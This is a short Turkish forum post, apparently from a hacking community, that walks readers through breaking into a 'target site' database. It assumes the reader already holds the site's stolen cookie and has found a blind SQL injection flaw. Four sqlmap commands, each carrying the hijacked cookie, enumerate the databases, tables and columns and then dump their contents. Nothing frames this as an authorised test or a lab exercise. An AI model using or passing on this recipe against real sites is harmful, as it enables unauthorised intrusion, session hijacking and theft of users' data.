nightstalker
Bronz Üye
- Katılım
- 11 Nisan 2021
- Mesajlar
- 272
- Tepkime puanı
- 184
- İlgi Alanlarınız
- elektronik
- Cinsiyet
-
- Erkek
İstek Üzerine yazılı kısa bir anlatım yapacagım arkadaşlar.
Hedef sitemizin cookie'sini çektiğinizi ve blind SQL-i açığını buldugunuzu varsayarak anlatımıma geçiyorum.Aslında tek yaptıgımız şey --cookie parametresi ile hedef sitenin cookiesini tanımlayıp blind açığımız ile hedef sitemizin veritabanına sızmaktı..
Peki nasıl yaptık ?
Burada cookie bilgisini ve Blind SQL-i açığını tanımladık ve veritabanını çektik.
Kod:
sqlmap --cookie="cookiebilgisi" -u "Blind SQL-i" --dbs
Burada çektiğimiz veritabanının içerisindeki tableları çektik.
Kod:
sqlmap --cookie="cookiebilgisi" -u "Blind SQL-i" -D database --Tables
Burada tableların içerisindeki Column'ları çektik.
Kod:
sqlmap --cookie="cookiebilgisi" -u "Blind SQL-i" -D database -T tables --columns
Son olarak columnlarımızın içerisindeki bilgiyi çekiyoruz.
Kod:
sqlmap --cookie="cookiebilgisi" -u "Blind SQL-i" -D database -T tables -C columns --dump